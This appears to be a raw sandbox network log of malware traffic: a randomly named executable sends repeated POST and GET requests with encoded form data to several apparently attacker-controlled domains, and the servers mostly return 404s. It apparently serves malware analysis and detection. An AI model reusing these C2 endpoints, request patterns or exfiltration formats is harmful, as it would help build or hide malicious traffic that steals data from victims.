                                                                                  Nov 20, 2024 08:32:50.683286905 CET1856OUTPOST /80gy/ HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.beythome.online
                                                                                  Referer: http://www.beythome.online/80gy/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 77 31 41 52 42 42 65 45 4a 42 78 6e 5a 43 64 6e 58 4e 66 49 38 53 6e 7a 2b 7a 62 51 31 34 68 6b 48 48 4f 61 73 68 76 78 57 4f 36 65 4f 53 57 55 67 79 50 51 49 68 6e 54 71 6e 4a 4f 55 78 59 74 31 6b 63 76 53 59 67 6c 70 54 6e 57 34 5a 6d 42 71 44 77 36 63 34 38 48 32 59 58 65 32 49 56 5a 6b 72 68 33 7a 6e 59 42 55 69 71 59 73 31 41 4b 38 64 2b 78 7a 4d 74 42 51 52 75 6b 63 4d 79 6b 57 38 31 55 76 54 54 34 34 32 46 4c 44 4a 6f 5a 38 65 33 6d 73 42 49 54 36 50 33 4e 44 50 4f 42 64 52 43 46 4e 50 67 30 56 48 38 64 4c 61 58 6c 73 6e 54 36 77 62 5a 4a 69 6c 4d 71 4c 64 55 2f 6f 47 4d 77 69 6f 51 66 59 4e 59 75 6d 6a 61 30 74 64 4a 6c 66 2b 6e 54 50 34 42 2f 67 73 6e 63 32 6d 58 41 69 44 7a 32 42 6b 39 58 55 7a 78 48 66 4b 37 43 5a 70 64 4d 58 2b 50 2f 2b 4e 4f 58 59 31 61 4f 59 71 39 35 61 31 4d 48 39 63 32 4f 32 36 59 74 47 53 42 71 43 79 6a 4d 6e 74 4c [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEw1ARBBeEJBxnZCdnXNfI8Snz+zbQ14hkHHOashvxWO6eOSWUgyPQIhnTqnJOUxYt1kcvSYglpTnW4ZmBqDw6c48H2YXe2IVZkrh3znYBUiqYs1AK8d+xzMtBQRukcMykW81UvTT442FLDJoZ8e3msBIT6P3NDPOBdRCFNPg0VH8dLaXlsnT6wbZJilMqLdU/oGMwioQfYNYumja0tdJlf+nTP4B/gsnc2mXAiDz2Bk9XUzxHfK7CZpdMX+P/+NOXY1aOYq95a1MH9c2O26YtGSBqCyjMntLx5/lZvYauui7JuCn18GyNWfbAj0B0TOag7qTr0Hj41yI6OMUBvoOdplZT9eX1KemoBhq1NMZzjs5Nu+JYGhDst1Z4JeHoXzrWeLPeJ4rzJSvWG/CAdK8K3ZwA+RblYxyYiAOGgnLohLfOGu1DSlEXkmlCAqmiEZF/5P/1p6pCvw/B1yRHPud48vzGmC3SM4qWmkrMCc3Bf4EVdFSMpBp8xRvofTXe4VAEoNYgsj1JYvIakfttnGnNjTVZyqA10CKOuJ9VanzSfKPYfpkC0lMxF4Cr+1N6Q3j4lL9lgQHV6YDLZFm3VITBe7ZXhdGSHDq5JuwYN4uxSCiUiF7WmH+ghFR5x/uapjTgGnkwWFW7dKGetZVBapsdm8dMb7a4CpxI+LGZ15eaAzalnqq2PuHA38sumDjKSVXwARNz/wWeJFWNZi/pVTNFhF8n94YMv11fGVxynBJRY9aFZq6wl1NCQVqODmtOnwiWjrYrtpXjMvUotf0h+NhayzLAAnIgRI6tBIu/CivcX7/HSzMBv1muUTGCvY4iXldmtnBmU3prvYOmWEqbsFm5+MFUXnJZFsA5y3bhadncJCKM0w/ee0W8ABhA6hSVThVQ7KVFvLXSZKx0hb3itBrfo/T7dvBP0sQ6/dcE+AAJuw5bPKHRrxTzQsGG2KB5x1n9z [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.65000385.159.66.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:53.221496105 CET557OUTGET /80gy/?9xn=fHadNpk8MVax&GR54yHZ8=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sMbIBlgbQh0ui0+zZIwlVcUsfMWllXpvy1Ukuj6D4Ic/01nyaOg= HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:32:53.922540903 CET225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Wed, 20 Nov 2024 07:32:53 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-11-20T07:32:58.8059698Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.650004103.21.221.4803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:59.045275927 CET840OUTPOST /0kli/ HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.tempatmudisini06.click
                                                                                  Referer: http://www.tempatmudisini06.click/0kli/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 49 50 64 41 32 43 56 4a 6a 55 6a 77 5a 47 73 65 4b 70 4f 74 6e 37 76 57 54 68 6a 2f 44 56 36 61 4a 63 4f 54 62 6b 49 6a 78 4e 6d 50 4d 30 51 4a 6c 74 7a 65 2f 67 59 31 49 56 56 33 66 6f 32 58 44 63 5a 43 50 5a 6d 76 64 74 74 5a 48 75 37 61 6c 6b 6d 72 33 41 4e 4a 61 38 63 53 39 6b 47 32 53 4d 6b 71 57 6e 32 34 2f 49 4b 56 38 5a 46 7a 59 61 30 52 71 51 58 79 57 74 77 58 4c 52 73 67 55 34 6b 47 52 68 6e 32 43 2f 44 72 56 6a 41 34 71 76 4a 34 56 43 48 68 2f 62 4f 47 2b 56 49 61 66 36 4c 70 47 59 69 64 57 66 51 50 43 33 76 65 35 6b 77 78 76 36 39 70 70 75 76 6d 37 7a 74 45
                                                                                  Data Ascii: GR54yHZ8=IcIMsTazYCJeIPdA2CVJjUjwZGseKpOtn7vWThj/DV6aJcOTbkIjxNmPM0QJltze/gY1IVV3fo2XDcZCPZmvdttZHu7alkmr3ANJa8cS9kG2SMkqWn24/IKV8ZFzYa0RqQXyWtwXLRsgU4kGRhn2C/DrVjA4qvJ4VCHh/bOG+VIaf6LpGYidWfQPC3ve5kwxv69ppuvm7ztE
                                                                                  Nov 20, 2024 08:32:59.965503931 CET1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:32:59 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.650005103.21.221.4803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:01.591272116 CET864OUTPOST /0kli/ HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.tempatmudisini06.click
                                                                                  Referer: http://www.tempatmudisini06.click/0kli/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6d 4f 61 4f 34 4b 54 59 67 38 6a 32 4e 6d 50 44 55 51 4d 72 4e 79 53 2f 67 55 48 49 58 52 33 66 6f 79 58 44 63 70 43 4f 71 65 73 66 39 74 48 66 65 37 55 34 30 6d 72 33 41 4e 4a 61 2f 68 4a 39 6c 75 32 53 63 30 71 57 46 4f 35 38 49 4b 55 72 70 46 7a 4a 4b 30 56 71 51 57 52 57 76 49 35 4c 54 6b 67 55 39 59 47 53 77 6e 35 4c 2f 44 74 62 44 42 34 69 39 67 72 61 7a 2b 58 33 49 33 72 70 79 55 65 61 4d 57 7a 61 72 69 2b 45 50 77 4e 43 31 33 73 35 45 77 62 74 36 46 70 37 35 6a 42 30 48 49 6e 38 4c 72 66 6d 66 45 55 72 63 6f 43 57 76 6a 47 7a 4c 42 4a 34 77 3d 3d
                                                                                  Data Ascii: GR54yHZ8=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCmOaO4KTYg8j2NmPDUQMrNyS/gUHIXR3foyXDcpCOqesf9tHfe7U40mr3ANJa/hJ9lu2Sc0qWFO58IKUrpFzJK0VqQWRWvI5LTkgU9YGSwn5L/DtbDB4i9graz+X3I3rpyUeaMWzari+EPwNC13s5Ewbt6Fp75jB0HIn8LrfmfEUrcoCWvjGzLBJ4w==
                                                                                  Nov 20, 2024 08:33:02.486272097 CET1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:33:02 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.650006103.21.221.4803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:04.136784077 CET1877OUTPOST /0kli/ HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.tempatmudisini06.click
                                                                                  Referer: http://www.tempatmudisini06.click/0kli/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6e 32 61 4a 4c 53 54 59 42 38 6a 33 4e 6d 50 4b 30 51 4e 72 4e 79 66 2f 68 39 4d 49 58 63 4d 66 72 61 58 4d 66 52 43 48 37 65 73 57 39 74 48 44 75 37 56 6c 6b 6d 45 33 45 70 46 61 2f 78 4a 39 6c 75 32 53 65 63 71 51 58 32 35 36 49 4b 56 38 5a 46 33 59 61 30 78 71 55 36 76 57 76 4d 48 4c 69 45 67 55 64 6f 47 43 53 50 35 54 76 44 76 57 6a 42 57 69 39 39 7a 61 79 54 35 33 4a 43 77 70 31 38 65 5a 4c 6e 34 50 71 50 6a 56 4f 42 76 64 43 7a 71 35 7a 63 34 72 62 35 75 71 49 6d 31 36 45 34 62 6b 63 6a 57 75 2b 41 56 73 4b 4e 73 51 59 4f 6b 6e 5a 45 56 72 76 5a 63 51 33 61 48 6d 43 46 48 77 4c 65 6b 4b 51 5a 71 71 5a 31 6a 77 57 65 6f 76 39 50 51 39 44 64 54 44 6a 46 69 44 4b 53 58 4c 50 4d 49 61 61 47 66 71 70 55 54 2f 41 6f 47 42 7a 6d 6e 6b 50 2f 48 65 55 56 33 6f 38 6b 41 30 56 6c 51 6c 66 68 39 34 30 43 6e 58 59 68 4e 72 75 31 67 52 67 65 76 52 2b 56 55 34 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCn2aJLSTYB8j3NmPK0QNrNyf/h9MIXcMfraXMfRCH7esW9tHDu7VlkmE3EpFa/xJ9lu2SecqQX256IKV8ZF3Ya0xqU6vWvMHLiEgUdoGCSP5TvDvWjBWi99zayT53JCwp18eZLn4PqPjVOBvdCzq5zc4rb5uqIm16E4bkcjWu+AVsKNsQYOknZEVrvZcQ3aHmCFHwLekKQZqqZ1jwWeov9PQ9DdTDjFiDKSXLPMIaaGfqpUT/AoGBzmnkP/HeUV3o8kA0VlQlfh940CnXYhNru1gRgevR+VU4CzA1/YCrFmeWA2RrbCVYqpHjNU8lwpM/SHDeCVeM97yiGrFUMn5Ax7A2TXvocGJnafe3ujQ4Ifyu77qHCnJ5GjCk5qL+SGHayxznxTftFdLf2ED1BQk5PYSqfoBq3IZkMBmi8q18K7OT1pPd+TC/ND0NHJeiZfWb2lsjWE4o5JjucQqdThVGDVqH6yzjr6AX+1ueeA8GwT8S+I1NjsTIcls4531/cKMxRcT0k3SG43PwTVNTZ9jEdIukUS10voAZoqaeIdYNhstN6anFxtmCRXPvYWGjOpPTGnIjuAnbFlFjoeMCK5qCqH+4JgOD5Krw6DYFjUXkGDJBqYmwAdl97SUazBt9Ly+09U7vDyJCLHp8ul8sgkbd3rw0DFopU3z/FOxfS6SCR7nCjQiLx+32phs/B4YPHSQqY2Cze47Dy6hfJOi5cIqAXaWGz4eH0Lykyb2eHoen+l/tPJ1AHfaJW/7KNPrtwMiUg2dJ9nRUiF9jJYo5NmK6ih2QfFCWID4eYFikKjII9UR0EXCt1ogmsChtU4isRaqq3jIt0AYiXX0jCWJ4iBhDdICgs1p8miHNSXxyHhAlgjf2lxmjC4GxEdKcuulAg0vhlMpWpx09CrkBlqM1OylHPdaZZYV6h/15RDbnuoOdzZI5acp61P5TDxFQZxJZfE7BA1 [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:05.035121918 CET1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:33:04 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.650007103.21.221.4803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:06.679197073 CET564OUTGET /0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:07.596127033 CET1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:33:07 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.650008188.114.96.3803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:12.709978104 CET816OUTPOST /ipd6/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/ipd6/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
